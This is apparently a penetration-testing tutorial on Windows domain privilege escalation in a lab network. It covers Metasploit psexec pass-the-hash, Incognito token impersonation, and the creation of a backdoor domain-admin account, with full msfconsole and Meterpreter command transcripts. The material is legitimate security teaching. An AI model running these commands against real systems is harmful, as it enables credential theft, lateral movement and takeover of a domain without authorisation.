Post-Exploitation with “Incognito”.
Incognito is a tool used to escalate privileges inside an Active Directory domain during the post-exploitation phase of a penetration test.
It started as a standalone tool, was later included in Metasploit as a module, and is now available as a Meterpreter extension. In this demo we are going to use the “Incognito” extension of Meterpreter.
It is used to impersonate access tokens (the authentication tokens Windows attaches to every process and thread) on compromised Windows hosts.
Access tokens are somewhat like web cookies: a temporary key that lets a process access services and files on the domain without asking for the user’s credentials every time.
There are two kinds of tokens, “impersonation tokens” and “delegation tokens”; the names refer to the token’s impersonation level.
- Delegation: created for interactive sessions, such as logging on at the console or via Remote Desktop. A delegation-level token can be used to authenticate to other systems on the network as that user.
- Impersonation: created for non-interactive sessions, such as connecting to a shared network drive. An impersonation-level token can only be used on the local system; it cannot authenticate to remote hosts.
Those tokens stay available as long as some process holds them, which in practice often means until the system is rebooted. When the user logs off, the delegation token created at logon is converted into an impersonation token, but it keeps the same rights and group memberships it had as a delegation token.
On a compromised system with “Administrator” or “SYSTEM” privileges (with Meterpreter, run “getsystem” first), it is possible to use “Incognito” to impersonate any user that has left a token on it.
But why would we need to impersonate a user if we are already “Administrator” of the compromised host?
The answer is to escalate privileges in the domain, and then compromise every system in it.
Network administrators often use the same “Administrator” password on all the servers, a different one for the “Administrator” account of the workstations and, of course, a different one for the “Domain Administrator”. So if we compromise a server, with the dumped hashes and a “psexec” attack we can, with some luck, access and compromise other servers, but not the whole domain (sometimes we can, but not usually). For that we need an account in the “Domain Admins” group.
This is where “Incognito” becomes interesting with its impersonation feature.
As a pentester, the best targets for “Incognito” are file servers and development servers, because many users log on to them and they usually hold lots of tokens.
To show the use of “Incognito” in an easy and clear way, I set up a lab network with three servers: one Windows 2008 R2 (the Domain Controller of the ACME.local domain) and two Windows 2003 Servers, one named SRV-PROD and the other SRV-DEV.
Here is the network diagram I’m going to use:
The local Administrator account has the same password on all servers. (One of the servers, the Windows 2008 one, is in Spanish, so the user “Administrator” is called “Administrador”; the two Windows 2003 servers are in English.)
In the domain there are the “Administrador” user (Administrator in Spanish), Alice and Bob. Alice works in the IT department and her user is in the “Domain Admins” group. Bob works in administration and his user is a normal user.
The demo assumes that the pentester has already obtained a Meterpreter shell on the production server (SRV-PROD) and has escalated privileges to “SYSTEM”. How to get the shell is outside the scope of this article; it can be done in many ways, such as through a SQL injection in a web application backed by MS SQL Server, with social engineering, by exploiting a known bug in some service, with a 0-day, etc.
Here is the start meterpreter session:
Then we load “incognito” and list the tokens on the system.
As we can see, all the tokens belong to the local system, where we already have the highest privileges. We need to look for more systems on the network.
One option to find more systems is the “net view” command, which lists the hosts in the domain that expose shared resources.
We can see three systems in the “net view” output: the localhost (SRV-PROD), DC1 and SRV-DEV. We can list the shared resources on DC1 by running “net view \\DC1”, for example.
Knowing the names of the other systems, we can get their IPs with the “nslookup” command or with “ping DC1”.
The next step is to try to access the other boxes with a “Pass The Hash” attack, using the local account hashes dumped from the compromised system.
For the demo, the attacking box is on the same LAN as the targets, so we point the exploits directly at them. In a more realistic scenario the pentester is outside the target LAN, but having a Meterpreter session on a box inside the LAN lets the pentester reach the other boxes simply by adding a route in Metasploit that uses the Meterpreter session as a gateway. Once the route is added to the Metasploit Framework, the rest of the attack works exactly as shown, with the same target IPs. (It is recommended to use “bind” payloads instead of “reverse” payloads if the pentester does not have a public IP address that the targets can reach without restrictions; with a bind payload the new session is opened through the route, not through a callback.)
First we try to access DC1 as “Administrador” (if this works, our goal is already achieved).
As we can see, the credentials do not work on this box.
Now we change the remote host IP to the SRV-DEV IP (192.168.65.102).
The first attempt fails, but remember we said before that the Windows 2003 boxes are in English, and we are using the user “Administrador”. We change the user to “Administrator” and try again.
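The pivot and pass-the-hash steps above, as an added msfconsole transcript that is not part of the original post. The session number (1), the LPORT, the hash values and the DC1 address are assumptions (the post does not show them); the SRV-DEV address is the one used in the post, and the module options are the real ones of exploit/windows/smb/psexec.

```msfconsole
# Added example, not from the original post. Assumed: session 1 is the
# SYSTEM-level Meterpreter on SRV-PROD, <DC1 IP> is the address resolved
# with nslookup, and the hash values are placeholders.

# 1. Dump the local account hashes on SRV-PROD (needs SYSTEM). The
#    relevant line has the form  Administrator:500:<LM hash>:<NTLM hash>:::
meterpreter > hashdump
meterpreter > background

# 2. Only when attacking from outside the LAN: route the target subnet
#    through the Meterpreter session so the exploit can reach the boxes.
msf > route add 192.168.65.0 255.255.255.0 1
msf > route print

# 3. Pass the hash with psexec. SMBPass takes LM:NTLM, no password needed.
#    A bind payload is used because the targets may not be able to connect
#    back to the attacker; Metasploit connects to it through the route.
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit(psexec) > set LPORT 4444
msf exploit(psexec) > set SMBDomain .
msf exploit(psexec) > set SMBPass <LM hash>:<NTLM hash>

# 4. First DC1 with the Spanish account name. This fails, as in the post:
#    the domain "Administrador" has a different password.
msf exploit(psexec) > set SMBUser Administrador
msf exploit(psexec) > set RHOST <DC1 IP>
msf exploit(psexec) > exploit

# 5. SRV-DEV is an English box, so the local account is "Administrator".
#    The same hash works and psexec gives a SYSTEM session there.
msf exploit(psexec) > set RHOST 192.168.65.102
msf exploit(psexec) > set SMBUser Administrator
msf exploit(psexec) > exploit
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

SMBDomain is set to “.” so the hash is tried against the local account and not against ACME; the exploit reports success only when the service it creates on the target starts, so a wrong account name or password shows up as a failed login on the target, not as a crash.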
Bingo, we got a shell. Now let’s see what we have on this box with “Incognito”.
Now we have a token from the user “alice” of the “ACME” domain.
Let’s look at the user’s properties with a Windows command shell and the “net user” command.
Bingo!!! The user is in the “Admins. del dominio” group (the Domain Admins group in Spanish).
That means that if we can impersonate the user “alice”, we become a domain admin and can work as her on any box inside the “ACME.local” domain.
Let’s try to impersonate the user “alice”.
Once we are “Alice”, we use the “net user” and “net group” commands from “cmd.exe” to create our own admin user in the domain. Note that this only works if Alice’s token is a delegation token: creating a domain user means authenticating to the DC over the network, which an impersonation-level token cannot do.
Here is an example.
We just created a user “hacker” with password “g00dhack123” and added it to the “Admins. del dominio” group.
This can be checked directly in the domain users console on the DC1 server.
Now we are domain administrators with a user we fully control, which can be used to access any system in the domain via Remote Desktop (as long as Remote Desktop is enabled on the boxes; lots of companies have Remote Desktop open to the Internet these days).
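The token listing, impersonation and domain user creation above, as an added Meterpreter transcript that is not part of the original post. Output lines are reduced to what the post states (the token of ACME\alice and the SYSTEM token); the DC1 address used by the incognito add_user alternative is an assumption.

```msfconsole
# Added example, not from the original post. Run inside the SRV-DEV session
# obtained with psexec; it is SYSTEM, so incognito can enumerate every token.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load incognito
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
ACME\alice
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
...

# We want the delegation token: it can authenticate to the DC, while an
# impersonation-level token only works on SRV-DEV itself.
# The Meterpreter console needs the backslash doubled.
meterpreter > impersonate_token ACME\\alice
[+] Delegation token available
[+] Successfully impersonated user ACME\alice
meterpreter > getuid
Server username: ACME\alice

# Spawn cmd.exe with -t so the new process runs with the impersonated
# token; without -t it would still run as SYSTEM of SRV-DEV.
meterpreter > execute -f cmd.exe -i -H -t
C:\WINDOWS\system32> net user alice /domain
C:\WINDOWS\system32> net user hacker g00dhack123 /add /domain
C:\WINDOWS\system32> net group "Admins. del dominio" hacker /add /domain
C:\WINDOWS\system32> net group "Admins. del dominio" /domain
C:\WINDOWS\system32> exit

# Alternative that does the same from incognito itself (use one or the
# other, not both): the -h option names the host the user is created on.
meterpreter > add_user hacker g00dhack123 -h <DC1 IP>
meterpreter > add_group_user "Admins. del dominio" hacker -h <DC1 IP>

# Drop the impersonated token and go back to SYSTEM when done.
meterpreter > rev2self
```

Two practical notes: “net user alice /domain” is the check that tells you whether the token is worth impersonating before you do it, and the account creation is recorded by the domain controller as a user-creation event, so on a real engagement it should be agreed with the client and removed at the end.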
Well, that’s all. I hope you enjoyed it.